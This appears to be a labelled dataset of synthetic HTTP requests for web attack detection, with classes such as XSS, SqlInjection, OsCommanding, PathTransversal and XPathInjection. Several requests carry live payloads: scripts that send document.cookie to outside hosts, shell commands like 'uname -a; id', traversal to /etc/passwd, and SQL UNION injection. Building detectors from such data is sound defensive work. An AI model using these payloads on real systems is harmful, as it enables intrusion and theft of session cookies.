Cookie: e0mhldu1kw5eme=vbse<Ne;Lmrehomop8Ta=u3e;nse7uhttrfMazi8=pmy rRR+flssM
Cookie2: $Version="2"
Date: Fri, 23 Mar 07 16:38:12 GMT
ETag: "14UmgyVJx4Sug6vrUA4w"
Expect: reChrjl
From: iuaea@cvOyle.it
If-Modified-Since: Mon, 10 Jul 06 13:10:58 GMT
If-Unmodified-Since: Mon, 02 Nov 09 22:09:09 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Oct 04 21:12:28 GMT
Max-Forwards: 23
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM c2hkbDNhbmRhMGVJbGluUmN3MW9zM2VlbFdleHFpZWhBbmFzaURmOW1tZG8xeg==
Authorization: Basic bnJ0bjpndEVmb24=
Range: 118-482,-132
Referer: http://www.tTNg.org/qUncn/mLin4ats.htm
TE: trailers,chunked,deflate;q=0.0
Trailer: Via
User-Agent: [\xC0][\xBC]script >[document.location.replace   ('http://www.neti.com/cgi-bin/il.cgi'+document.cookie);][\xC0][\xBC]/script   >
UA-Pixels: 488x452
Via: 0.7 163.142.1.108
Transfer-Encoding: gzip
Upgrade: Ecza/9.5
Warning: 274 234.103.99.211 "otEEOe5Kno" "Sun, 01 Jul 07 17:52:41 UTC"
X-Serial-Number: 4075489
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46636
Start - Id: 42893
class: OsCommanding
GET /tJYAHZpT.asp?ct=hQzdNPUR.pU&gFOee9=agR+aO+3uh++o&t8hfNs9p=%5Chz5&eukai8imooTuSIa=earsxe&alar=127&caotkvnmltzi=numaooedbav&O0gOTwhereRo_=2715&PWharNqHYIZ=%7C+dir+++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+%2C&mndb74aheA=d HTTP/1.0
Host: 193.177.249.146:06
Connection: yrem7i
Accept: audio/*, application/rtf;q=0.5, video/mpeg;q=0.3
Accept-Charset: iso-10646-ucs-2;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.1
From: rfDBiron@toyatas.gov
If-None-Match: "L_R6S_PFLrk-SxxjzHfm"
Max-Forwards: 6
Authorization: Basic ZWNkYWVpOnVyM2VocA==
Referer: /hrrwabr/tbIeeapi/isati/lbqhrm8p.tar.gz
TE: trailers,trailers,trailers
User-Agent: 1probhit6 (tw30scddW; ryMGuEDpHX; tOETsX7NnX; m1@nw_5Rk; o.LoD4_lW)
Transfer-Encoding: identity

null

End - Id: 42893
Start - Id: 48774
class: XPathInjection
GET /ssAti3d1coic/reAg/aeoflIz0/pUjHrt.html?hnd=%28i++++%3C++++count%287v%2Fchild%3A%3Atext%28%29%29+and+++++j+%3C+count%28pIA%2Fchild%3A%3Acomment%28%29%29++++and+k++%3C+++++count%28cEugo%2Fchild%3A%3A*%29++++%29&iee=ad HTTP/1.1
Host: 31.159.160.15
Connection: ntadaa
Accept: */*;q=0.8
Accept-Charset: x-mac-cyrillic;q=0.9, iso-8859-6;q=0.8, iso-8859-9
Accept-Encoding: 
Accept-Language: *
Cache-Control: pj3cit='x'
Client-ip: 132.71.74.85
Cookie: toCe1tO=5141;neivmdonp7hncr=936;nedtddamitkZyoP=r;cntnegnkecer=478918;nsA=2 apd
Cookie2: $Version="67"
Date: Sun, 25 Nov 07 08:33:39 CET
ETag: "XaSF7ffVYiharLa0lA"
Expect: 100-continue
From: eaa6xs@nsEi2dUOb.uk
If-Modified-Since: Wed, 19 Sep 07 20:36:50 CET
If-Unmodified-Since: Wed, 04 Jun 08 12:30:15 GMT
If-Match: *
If-None-Match: "NXcWJm3vnSdIGNZ8"
If-Range: Wed, 21 Feb 07 22:57:55 UTC
Max-Forwards: 7251
MIME-Version: 6.1
Pragma: 00='do9v'
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: Digest opaque="hnrosm"
Range: -333764,-7
Referer: http://ctopu.biz/4IUy746.wav
TE: trailers,trailers
Trailer: Trailer
User-Agent: uxgaerbtte/8.2
UA-CPU: MIPS
UA-Disp: 019,118,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0640x829
Via: 1.6 www.tatea.html:26111
Transfer-Encoding: compress
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 178 131.107.128.102 "ir74fettml" "Sat, 10 Jul 04 12:45:47 GMT"
X-Forwarded-For: 160.70.37.175
X-Serial-Number: 265535777881770929
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48774
Start - Id: 46241
class: PathTransversal
GET /oeso5s3/vwphpP_bqH6/ltsitrxW/2h5vIMF1_IaTt/iPGuKACslgOFVUY1DB/mdnt/eFqU-.voEi/pftcss/YLjsock_streamW_cd56pH/iOkkT/nFtWi.nsf?aNeBusoNl=ateoceans6Pt0h&nc48gOR0=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.0
Host: 166.196.109.176:20109
Connection: close
Accept: */*
Accept-Charset: us-ascii;q=0.1
Accept-Encoding: gzip, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 28.111.235.221
Cookie: IweLJP@JheFscript=en8lG2ii
Cookie2: $Version="8"
Date: Thu, 02 Feb 06 16:29:42 CET
ETag: "uVWqFjF1f7c@HvfRr"
Expect: hoahd=l6nt2Ete;SDpta=EeAen5
From: eftra@neleobejy.com
If-Modified-Since: Tue, 24 Nov 09 19:46:52 UTC
If-Unmodified-Since: Wed, 28 Apr 10 07:27:19 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 28 Apr 08 13:26:27 UTC
Max-Forwards: 10
MIME-Version: 1.9
Pragma: z1xn5hue='da'
Proxy-Authorization: Digest username="a3i2n"
Authorization: Basic bzZpbTdpZDpKa3VydGg1bQ==
Range: 173-
Referer: http://tehWv.uk/biUimv/aifsn/a2ehife/aosEcisL.nsf
TE: trailers
Trailer: Accept-Encoding
User-Agent: tAnwZFG http://www.caroidTt.com
UA-CPU: 68000
UA-Disp: 3006,9406,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7340x8822
Via: 5.9 194.136.148.206, iis6mO/4.7 www.vInnB.png
Transfer-Encoding: deflate
Upgrade: Sdb/4.1
Warning: 061 www.aomelt.jpeg "e3tta" "Tue, 23 Jan 07 20:12:20 GMT"
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46241
Start - Id: 48017
class: XSS
GET /wo8fnvetlOTo1oa/ttihitu/easn4acsscteiw/gEuqCfepZIw45d.shtml?ndssggeuo=aephpxwata6t&cit=6&rzu=986&5sla=+nc&vyraoN14unhssN=beT%7C7he+aqrmeta&3sttlsztdaxmeOo=520021544&gr4oitacn=5lhtr%3C&gi1enDo1dstasr=m95erTon%3CboI&yeth=262&TWiHv=64&hniopnwtvrni6u=%3Cdiv++style%3D++++%22+++binding%3A+url%28%5Bhttp%3A%2F%2Fwww.lill.com%2Fscript%2Foaimxs.php%5D%29%3B++++%22++++%3E&fh=85993 HTTP/1.0
Host: 168.241.59.60
Connection: keep-alive
Accept: text/*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.7, gzip, identity;q=0.6
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 2.173.165.120
Cookie: LlD=dagybe0uobyllpsrch;utetmyaardeNoi=s
Cookie2: $Version="114"
Date: Sat, 03 May 08 02:52:18 GMT
ETag: "BsMCShRFmP9CVy6mls"
Expect: 100-continue
From: uesois@ewrsoxtt.it
If-Modified-Since: Mon, 07 Feb 05 03:17:30 CET
If-Unmodified-Since: Tue, 08 Jan 08 02:47:03 GMT
If-Match: *
If-None-Match: "iqwEhKo9ppbJH0qznJ4F"
If-Range: *
Max-Forwards: 9140
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: uedrde k86eh=jiih
Authorization: Basic bmxhaWtFZmc6dG5iZ25kbw==
Range: 3837-2
Referer: http://www.koo4ou.com/rcdhl.txt
TE: gzip,trailers,deflate;q=0.4
Trailer: Accept-Charset
User-Agent: rtieurFh/1.0.7.2.0
UA-CPU: 68000
UA-Disp: 212,5646,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9754x5278
Via: 2.7 www.satyol.shtml, ninng/7.3 2.16.14.183, 4.7 www.5us8s.js
Transfer-Encoding: gzip
Upgrade: DUyx4/6.1, udlo5/7.2
Warning: 237 106.180.134.229 "4e4socieooaey" "Fri, 14 Dec 07 11:55:14 UTC"
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 698729021
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 48017
Start - Id: 45392
class: PathTransversal
PUT /eJ/thanes6kosewe9/rrhue/yUSnlFq/fQeA/rfuQottndsempe/tiaaEESch/ruwete2miwin/cesa5mdnI/dJAa.nsf? HTTP/1.0
Content-Length: 49
Content-Language: Mua,dnbu1,ubideot
Content-Encoding: deflate
Content-Location: http://inyiTi.gov/ytsejo/sTti9tal.jpg
Content-MD5: a2FpMzRucm1vbGh5bmF6dw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Mar 05 12:15:43 UTC
Last-Modified: Tue, 21 Jun 05 21:25:17 UTC
Host: 176.79.50.191
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 2.231.241.65
Cookie: ielhb2smaem3re6=utJmjseNaw;idscf=aBCWybpX
Cookie2: $Version="7"
Date: Fri, 16 Apr 04 11:39:18 GMT
ETag: W/"reqAMqHfAzn77w6eGvyA"
Expect: 100-continue
From: dr4hcedC@tene.com
If-Modified-Since: Sun, 19 Dec 04 08:01:02 CET
If-Unmodified-Since: Sat, 19 Apr 08 19:39:26 UTC
If-Match: "0G3hCafjr.2N4XFsY5c2"
If-None-Match: *
If-Range: *
Max-Forwards: 013
MIME-Version: 1.9
Pragma: 3ttseau='ierl'
Proxy-Authorization: gclbs enS5me=dcjupRxa
Authorization: rhxae 6oesobs=jesaj
Range: 4-825,07-,961817-416
Referer: /ajs2r/ntoy/yncvn/torv/vwp9.msf
TE: trailers,deflate;q=0.2,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.1 (compatible; Konqueror/4.2; WinNT; deaO; fTKhoNn; Pgatco)
UA-CPU: Sparc
UA-Disp: 088,174,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 789x027
Via: oeaunp/3.5 www.tn1tnnew.html, HTTP/9.8 98.158.191.166:8856
Transfer-Encoding: deflate
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 928 www.yictte4.js "eobt1krstsZ2erAppmt" 
X-Forwarded-For: 35.190.104.115
X-Serial-Number: 37550564020499
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3ar8gn5bgu=..\..\..\..\WINNT\system.ini

End - Id: 45392
Start - Id: 36806
class: OsCommanding
GET /aE/sNT.c-W1iYm6dcWcYI5/saN2JzSfVWZq.bin?ilqegNodfM=aolj5gn%2Fnh+sd&lvwfu3d=dahpsdoHuymWae0&hnu=%7C+++echo+%22++Content-Type%3A+text%2Fhtml%22+%3B+++echo+%22%22++++%3B+++id++%5C0 HTTP/1.0
Host: www.erownmbPue.com
Connection: wluce
Accept: video/mpeg;q=0.6, image/*
Accept-Charset: euc-kr;q=0.5, windows-1254;q=0.7, ks_c_5601-1987, utf-8, x-mac-greek;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Cookie: lapoa=03711;tn26nete5r=niswon>Astn(y)l'ewphps;a.R_havingphpvXpmail=Dhh2usangSmochaM2q;eOdm38zitNheb3T=72
Cookie2: $Version="03"
Date: Sun, 11 Jun 06 14:15:58 GMT
ETag: "2i-Tsg8qHsrARqq@"
If-Modified-Since: Tue, 13 Jul 04 03:37:44 CET
If-Unmodified-Since: Wed, 18 Aug 04 15:01:47 GMT
If-None-Match: "e9e32HtIeCbZ7hCiff-A"
If-Range: Sat, 18 Jun 05 15:25:02 UTC
Max-Forwards: 55
Pragma: no-cache
Authorization: NTLM b3NkZnMzbm1VaDNidG1lZWNoSG1SZW5XcnNnMDd0aWVub2Fi
Referer: http://www.lotfjmNc.be/rtjreesi/aaeest/xuhxsdhe/f5no4is/oUso.asp
TE: gzip;q=0.8,trailers
User-Agent: Mozilla/5.5 (Machintosh; U; PPC 0.7; tl-xn; rv:9.0.5) Gecko/59682961
Via: 2.6 250.177.193.196, hey/5.7 75.118.149.67, HTTP/1.2 www.mneoTepl.jpg
Transfer-Encoding: compress
----: ---------------

null

End - Id: 36806
Start - Id: 46874
class: XSS
PUT /sA9@6jH3VEPyq8Sby0/eou1nESmIteameuo/eurqipiC8byrdwres/ecs7Iq84/Lswdea/mhtdtsnhyaseaaa/ee9nll9uuhtsrmsy/triei3SE/xzoA-Y_/qXDHv0E.htm? HTTP/1.0
Content-Length: 190
Content-Language: n
Content-Encoding: gzip
Content-Location: /oeii/2CruW2R/toay/8sti/McaEsfr.bin
Content-MD5: T1RlUmZ5ZWFzcm1uaXdlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 06 Jan 10 18:57:16 CET
Last-Modified: Fri, 22 Jun 07 21:28:56 UTC
Host: www.sneiei.org
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress
Accept-Language: 9e0anunn-QAzE;q=0.6, eshdea-gzfAreb, oehx-ta0o, dm-altf, u-ghdtr;q=0.4
Cache-Control: no-transform
Client-ip: 89.81.27.19
Cookie: eftsWO=htytMoTnwinnt|;1zhttps9NG=httpseeio?peDa8ee
Cookie2: $Version="8"
Date: Fri, 08 Jan 10 20:18:49 GMT
ETag: "snQRZD4OPsVukjFy"
Expect: mleses2
From: xorersew@0i1thu.fr
If-Modified-Since: Thu, 04 Feb 10 16:49:13 UTC
If-Unmodified-Since: Fri, 08 May 09 05:57:59 CET
If-Match: "RYN5Ev1671H6Ag1W"
If-None-Match: *
If-Range: *
Max-Forwards: 855
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Digest uri=/ioptabs/frdsoAN/sEhe7/Ittfram8.mpg
Range: -692,548156-61437,-79
Referer: /9cie/aGiOhat/giowNest/iz7et/Geau.sh
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.6 (Windows; U; Win98 8.7; la-sn; rv:8.0.0) Gecko/96272085
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2245x173
Via: qaaEsr/4.9 www.mct3.shtml, 0.1 www.oA9MrpU.jpg
Transfer-Encoding: deflate
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 910 www.aqeeeiu.htm "tjdShea8TwiOuAu" "Mon, 12 May 08 02:53:43 CET"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

pYh_nzW=884&etelnet2P_8ql3bU=<a   href    =    "   javas&#99;ript&#35;[window.open('http://213.146.159.136/lletli.exe'+document.cookie);]   "  >

End - Id: 46874
Start - Id: 42715
class: SqlInjection
PUT /cPPfCf-06eEy52lv/nO2Gp1/eoehdnMaetaa.png? HTTP/1.0
Content-Length: 187
Content-Language: 1Tnrpn,nstniO,S3sNHt
Content-Encoding: compress
Content-Location: http://www.ooupi.be/0cpru0e/uog3d/odnhO9/dtinWnk/MNelue.asmx
Content-MD5: bHRzMGh0YXRhdWVvbGFvYg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Mar 04 10:18:27 GMT
Last-Modified: Tue, 19 Jul 05 09:29:48 GMT
Host: 55.231.188.73
Connection: onnoTl
Accept: image/jpeg
Accept-Charset: koi8, big5;q=0.4, cp-932;q=0.5, cp-936;q=0.8
Accept-Encoding: compress, identity, deflate, deflate;q=0.2, identity;q=0.1
Accept-Language: sdnm-ittm;q=0.4, d1d-ryu;q=0.9, G-dnja;q=0.6
Cache-Control: only-if-cached
Cookie: 7mI=hnoen;m9gmssrattgte=edmheakn;yg@2metaLautoexecperloRal=s%2] |d;elrds=asfreaKWaeDols;etespsg7min1=e29kF;h8uTe3ot=0076111
Cookie2: $Version="2"
Date: Wed, 16 Feb 05 07:05:51 UTC
ETag: W/"Kre_3h3RPI6mXo8"
Expect: 5tyeuid
If-Modified-Since: Tue, 06 Dec 05 19:37:24 GMT
If-Unmodified-Since: Tue, 29 Jun 04 14:33:10 CET
If-Match: *
If-None-Match: *
If-Range: "cXLe_Wn4Lc9gKc_VtQ"
Max-Forwards: 9
MIME-Version: 9.7
Pragma: no-cache
Range: 178852-558277,2-2372,-0020
Referer: /esxnatn/hsqIs/cOdtrgy.jpeg
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: ';    insert  into    lj   values(666,'Ng','eiti',0xfffff)
UA-Disp: 966,2764,32
UA-Color: color16
UA-Pixels: 123x436
Via: 8.9 180.109.211.80
Transfer-Encoding: tcrTo; rsitcds=nmaw4q
Warning: 248 64.93.227.168:634 "DanimetRfrErrctntc" 
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Z0YOcRSm9R7L=b6oc6hxk&smC648cegShno=a3a&3Ibintelnet52w_MiJ=otDnbezauIaehQvfem&ettpNf1e8uio=seI1ael1dhueet&mvngO=7412613915&O-guR=dsyH1Hv7Ie&5di8co7l=yb&raAetbctOtr9=%aqir&r9gNes=t5vzIe7

End - Id: 42715
Start - Id: 43566
class: OsCommanding
GET /romai1s1uleeevnlcian/safwhoucstmdaett/umtiEhtaencon7tZ/frOEf-gEe86g-P9qvb0i/eob2wfAkrocnt/tseralm9esheo/aEI9dh1DTg4Pf2kNXBtm/FlVboot.iniatLO1GmwservicesFR.sh?UIcmpdd5Oc=+++%3B+++echo+%3B+++++w+%3B++uname+++++-a+%3B++id&reoi8lfeeseLu51=835 HTTP/1.1
Host: 67.244.201.237:948
Connection: Nwatq
Accept: audio/*, application/zip, audio/x-wav;q=0.0
Accept-Charset: x-mac-icelandic, iso-8859-1;q=0.1, x-mac-turkish, utf-7, iso-8859-3
Accept-Encoding: 
Accept-Language: cvlotzl-angN, o9Cbhafc-t;q=0.5, 7Ng0rp-sysl;q=0.6, obihArNl-r
Cache-Control: max-age=06
Client-ip: 198.169.183.255
Cookie: tnc=m9bt;z3=aygJP-MHGUe@;p8weis=n g;lnh6gllu=tVdHFv
Cookie2: $Version="9"
Date: Sun, 12 Feb 06 22:51:29 CET
ETag: W/"5iLoNVknU2PXMAfL"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Fri, 30 May 08 21:08:18 UTC
If-Unmodified-Since: Sun, 25 Jun 06 05:24:26 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Jul 06 22:21:31 UTC
Max-Forwards: 5524
MIME-Version: 7.0
Pragma: in=eeY3titb
Proxy-Authorization: szoGA tiskrnt=veetaa
Authorization: Digest qop=auth
Range: -198504,6676-
Referer: /lbzrhl/ejhgnqrn/ohsliram.wmn
TE: deflate,gzip;q=0.2,trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.9 (Windows; U; Win98 5.9; er-ei; rv:2.1.0) Gecko/18051451
UA-CPU: x86
UA-Disp: 6029,0160,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: HTTP/4.9 www.rNon.tiff, rela/2.1 www.eAirsOhn.jpg, 6.0 www.brAtnmta.tiff
Transfer-Encoding: identity
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 562 www.w7dtbosr.jpg "TDeee9Afma0tOoes" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 897186
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43566
Start - Id: 47230
class: XSS
GET /7CEHLsq/n13G/NR2scriptF/ev02e/uym4Uertkc/ek2zuOEhmrAS/yqL7h@KXmDTFCBuC.css?ranq8a=ihFgvdsexo&Lsstaeso3ro5=hitn&iso4eh=xml%3B+rmailnhtaccesifopt&yRutu2o=82347&llhtCoit9=43330&he=eT5pef&dOireplaceqbL7@KPu=nttn+pa&IXIg@cmdwQQ2Ta=2&ttaBe9zuei=ttcrp+accept%26iac&snosN=%26eoyh%2Bo&cmyia9no=%3Cimg+++src++++%3D++++%22+++elitilic+%3E+++%22+++++onmouseover++++%3D++++%22+++%5Balert++++%28%27h6zerr1e%27%29%3B%5D++++%22++%3E&en=nHeeAnOrEnt&o5ketso=enetcattst7Ahmailbpshutdownas&bwtcrEzddoeJe5=Raptdesc&VU3zuRKW=b9 HTTP/1.0
Host: 107.169.82.98
Connection: close
Accept: video/quicktime;q=0.9, audio/*;q=0.6
Accept-Charset: windows-1252, iso-8859-15, x-mac-roman, koi8;q=0.0, euc-kr;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: hltot-an;q=0.6
Cache-Control: x=eThme
Client-ip: 226.163.167.76
Cookie: 69Xl=o4zldb0Bbq;tlxg=2sl2aN;eee4baemsoi=ibZXVXx46
Cookie2: $Version="371"
Date: Mon, 05 Jan 04 17:49:23 CET
ETag: "RjnuhwPFZ.d.Sbq"
Expect: 100-continue
From: oreAv@osmi3u.be
If-Modified-Since: Sun, 11 Mar 07 12:02:40 GMT
If-Unmodified-Since: Tue, 31 May 05 15:52:47 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Apr 10 23:20:28 GMT
Max-Forwards: 995
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest response="53819Da8f4aCf6baeFB99dfFAfDaDCBc"
Authorization: nhwoDd De9cs=naEoj
Range: 642-53334
Referer: /lr9oNi/romavnwe.html
TE: gzip
Trailer: TE
User-Agent: nsnsdYke/1.4
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7301x0518
Via: HTTP/7.8 www.3ett6.jpg, 0.9 73.56.31.83, HTTP/1.2 www.shuamr.js
Transfer-Encoding: deflate
Upgrade: unbL/8.1, luoi/0.0, jgsmeh/0.8
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 16.107.252.123
X-Serial-Number: 736758197053618
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47230
Start - Id: 35648
class: XPathInjection
GET /i4y8yhnZerjxn/mnnoyydxgura8/aog1tlqeepL8Spstide/ejDpnra0s6ihifii3Uee.php3?toBeeo=815555&0iaty=5936++++or++1%3C++Aft6%2Fb5ngt%2Fuzece%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D8%5D+++++or+68%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&0tofneiler1syo=one8onis&SoSetoaed1Nc8tm=%28sxyethcate%3Cn%3E86&onrsisbiuh=h.T61&sock_streamTrXhtpasslskp34RF=ancfs&3IandpH_amO6X=oKV&h9eaigosT0uqaus=a0xGE6_c5&b4xXMlg8=hn%3Ao&FwgetlibD=87454&ihe8RueSeaah=OlikesE&Aa=z4nglrosj&6mxacj2Mihna=nsovRL HTTP/1.1
Host: www.e2iafs.net:084
Connection: keep-alive
Accept: application/postscript;q=0.9, text/*;q=0.3, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mnne-i0G7, ym-Miep;q=0.1, Ut-grxLd;q=0.6
Cache-Control: min-fresh=5
Client-ip: 145.205.77.74
Cookie: jnzsyiCt=z7wb;6e=79730;eocn=binprocessing-instructionh;ncoG0Navshutdownobjectobjectx_=0723356;ueU=7207254081
Cookie2: $Version="053"
Date: Sat, 06 Mar 10 17:14:03 CET
ETag: "M3ZVH_ldXyZcfC-"
Expect: linOta
From: 8oiisi@uknxnhisdr.org
If-Modified-Since: Thu, 06 Oct 05 14:17:44 CET
If-Unmodified-Since: Mon, 24 Jul 06 16:14:41 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: NTLM bHRscTVzaWF1eGVBcmZ3Y2xUYm5uY2Zzbndvc3NvaWZ1dHRvUmh5ZG15
Range: -38,162-85,-031
Referer: http://www.totsvs.st/IrmRxs.txt
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: yv-RE0x http://www.57NhotE.be
UA-CPU: StrongARM
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3327x2128
Via: 2.6 100.197.18.16, 0.4 201.148.135.80
Transfer-Encoding: identity
Upgrade: zizt/1.0, Nfsr/7.3, araJv/5.9, 0athyr/9.5, 7a2ey/9.9
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 9747150150274
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35648
Start - Id: 42469
class: SqlInjection
GET /roe5tzeetosilgsde/taItjbtnmialaorr5eH/7iu/Bm8Rcgm3iz/3g7c.aspx?BW7q1s=%27+%29++UN%2F**%2FION+++++ALL++++SEL%2F**%2FECT++++%27cstqdpme%27%2C49%2C865%2C%27wetare%27%2C9+++++FROM++abx3wa+++WHERE++%28++++%27%27%3D%27&tor=hOKo%40qTBs9i&wV=0265556&LgOmKchexec=h&ro2Nsr9ts=d%27eisdneeaeauE&ar5zti=%3Cnnnaformrha&qObA8T=r%3E&JiframemCfAEsystem=27922&tTi=neltGsT8mNwshbl&D_WPO=ektmOwnseliytiose&pkn0TjU=fhomexii0d%3Cf&msThisctlteN=dtsar&hfdert1=t9lo&p6ttnnAshrwti=0 HTTP/1.1
Host: 175.124.43.113:25845
Connection: ezIa75
Accept: audio/*;q=0.3, audio/basic, video/quicktime
Accept-Charset: utf-7;q=0.5, windows-1257, x-mac-chinesetrad;q=0.3, utf-8
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 137.106.140.246
Cookie: ehcfue=csrn
Cookie2: $Version="3"
Date: Wed, 25 Feb 09 06:31:56 GMT
ETag: W/"@dg_HmJm7tTPjS6Y_y"
Expect: 100-continue
From: eabBn@aahunaiie.fr
If-Modified-Since: Fri, 20 Aug 04 08:33:55 UTC
If-Unmodified-Since: Sun, 13 Mar 05 03:49:30 CET
If-Match: "-U7FdqCWo.2VbJWTuB_"
If-None-Match: *
If-Range: Sun, 13 Sep 09 17:59:33 CET
Max-Forwards: 95
MIME-Version: 1.4
Pragma: tiEo=tklt
Proxy-Authorization: Digest nonce
Authorization: Basic YmlkbmFhbzY6VGw5Ym1pbw==
Range: 909400-,77915-,-01017
Referer: /Ry6inh/ll5a/sehfr/XaTTiar.tar
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: nEMmhx4E http://www.e80s.org
UA-CPU: 68000
UA-Disp: 1488,9515,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: HTTP/8.9 www.bNermra.jpeg
Transfer-Encoding: identity
Upgrade: mc9c/0.1, Rek40w/1.3, rcow/4.1
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: -------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42469
Start - Id: 48274
class: XSS
POST /ISbwp-l/ljadw/oNoaeaedz7oeixeai.shtml? HTTP/1.0
Content-Length: 162
Content-Language: iAhpn,oesoi,rto
Content-Encoding: compress
Content-Location: http://www.yNiimtr.be/orentnd/I5Age/eh9ehot/hlneois/rticf.bin
Content-MD5: bk5uaW1YZWFzOXB5cmFyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 May 07 08:16:37 UTC
Last-Modified: Sun, 26 Feb 06 21:44:50 CET
Host: 126.68.12.198
Connection: katIC
Accept: */*
Accept-Charset: us-ascii;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: bguttl-a;q=0.0, ie-tyu;q=0.4
Cache-Control: only-if-cached
Client-ip: 125.63.208.90
Cookie: W2cinsertLXRtX@YW=saKhlXa;shavingtnetcatDCbN=ujWTH;uYiX-BVyinclude=<link   rel   =  " stylesheet  "     href    =   " javascript:  [window.open('http://158.237.206.74/enleer.swf'+document.cookie);]       " >
Cookie2: $Version="0"
Date: Wed, 01 Sep 04 08:06:16 UTC
ETag: W/"GnPUYNO32AlBdiAz"
Expect: setrwmes
From: udee@essEn6.cz
If-Modified-Since: Sun, 20 May 07 16:54:26 CET
If-Unmodified-Since: Tue, 12 Aug 08 10:47:33 GMT
If-Match: "sn4xoEdwmalqyyJ"
If-None-Match: "nxketHEFj.dPiLQ50xX"
If-Range: Wed, 15 Apr 09 23:59:52 CET
